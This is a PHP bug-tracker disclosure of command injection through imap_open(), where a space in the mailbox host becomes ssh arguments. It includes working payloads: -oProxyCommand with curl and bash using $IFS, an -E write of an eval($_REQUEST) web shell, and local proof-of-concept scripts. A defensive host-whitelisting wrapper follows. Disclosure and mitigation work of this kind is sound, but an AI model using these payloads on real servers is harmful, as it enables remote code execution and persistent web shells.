[2018-06-20 04:31 UTC] stas@php.net
[2018-06-20 04:31 UTC] stas@php.net
-Status: Open
+Status: Suspended
[2018-06-20 15:23 UTC] c dot r dot l dot f at yandex dot ru
[2018-11-20 19:36 UTC] stas@php.net
-Status: Suspended
+Status: Duplicate
[2018-11-20 19:36 UTC] stas@php.net
[2018-11-20 19:37 UTC] stas@php.net
Description:
------------
Hello. Some PHP CMSs/CRMs use the IMAP package in their features. I encountered such functionality in my research and found the ability to execute OS commands through the imap_open function, which can be exploited remotely or locally to bypass disabled_functions and open_basedir.

The test was conducted on a fresh "Debian 9" with "PHP 7.0.27", but most likely it's not important, because I think there are some problems in "libc-client" and this may affect other distros.

For some reason "libc-client" uses "/usr/bin/rsh" to check(?) the connection to a given hostname and adds additional arguments if a space character is present in the given mailbox. Then all arguments go to the "execve" call. In Debian-based distros "rsh" is a link to "ssh", so the "-oProxyCommand" option can be used for command execution and "-E" for file write.

Test script:
---------------
Remote:

```php
<?php
/* Payload notes kept in a block comment: a "?>" inside a "//" comment would end
   PHP mode and the imap_open() call below would never run.

   File write (value of the "server" parameter):
   <?=eval('eval('.strtoupper('$_REQUEST').'["x"]);');?> -E shell.php}

   RCE (POST body):
   server=x -oProxyCommand="`curl$IFS''localhost?PWN`"}&login=1&password=1
*/
imap_open('{'.$_POST['server'].':993/imap/ssl}INBOX', $_POST['login'], $_POST['password']);
?>
```

Local:

```php
<?php
// Drop a script next to the PHP file, then pass its name in the host part of the
// mailbox spec; the space turns the rest of the string into ssh arguments.
file_put_contents('x','touch /tmp/PWN');
chmod('x', 0755);
imap_open('{x -oProxyCommand="`bash$IFS\'\'x`"}', 0, 0);
unlink('x');
?>
```

Expected result:
----------------
Connection error

Actual result:
--------------
Unexpected OS command execution
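As an added example (not part of the bug report or of PHP itself), a wrapper that whitelists the host and mailbox name before they are interpolated into the spec handed to imap_open(); build_mailbox_spec is a hypothetical name, and the candidate hosts are constructed from the report's own payloads.

```php
<?php
// Added example, not part of the bug report: validate the host before it is
// interpolated into the {host:port/flags}mailbox string that imap_open()
// receives. The report's payloads need a space (plus quotes/backticks) inside
// the braces; a strict hostname whitelist rejects them before rsh/ssh ever runs.
declare(strict_types=1);

function build_mailbox_spec(string $host, int $port = 993, string $mailbox = 'INBOX'): string
{
    // RFC 1123 host: dot-separated labels of [A-Za-z0-9-], no leading or
    // trailing hyphen, 1-63 chars per label, 253 chars overall. This also
    // accepts dotted IPv4 literals; bracketed IPv6 is deliberately not handled.
    $label = '[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?';
    if (strlen($host) > 253 || !preg_match('/^' . $label . '(?:\.' . $label . ')*$/', $host)) {
        throw new InvalidArgumentException('rejected IMAP host: ' . var_export($host, true));
    }
    if ($port < 1 || $port > 65535) {
        throw new InvalidArgumentException("rejected IMAP port: $port");
    }
    // The mailbox part must not be able to reopen the brace block or smuggle
    // whitespace/control characters into it.
    if ($mailbox === '' || preg_match('/[{}\s\x00-\x1f\x7f]/', $mailbox)) {
        throw new InvalidArgumentException('rejected mailbox name: ' . var_export($mailbox, true));
    }
    return sprintf('{%s:%d/imap/ssl}%s', $host, $port, $mailbox);
}

// Constructed inputs: two benign hosts plus the two host values from the report.
$candidates = [
    'imap.example.com',
    '192.0.2.10',
    'x -oProxyCommand="`curl$IFS\'\'localhost?PWN`"',
    'x -oProxyCommand="`bash$IFS\'\'x`"',
];
foreach ($candidates as $host) {
    try {
        $spec = build_mailbox_spec($host);
        // Only a spec returned here would be passed on as imap_open($spec, $user, $pass).
        echo "OK       $spec\n";
    } catch (InvalidArgumentException $e) {
        echo "REJECTED " . $e->getMessage() . "\n";
    }
}
```

Later PHP releases also added the imap.enable_insecure_rsh INI directive (off by default), which disables the rsh/ssh path in libc-client altogether; validating the host as above is still worth doing so that attacker-controlled text never reaches the mailbox spec.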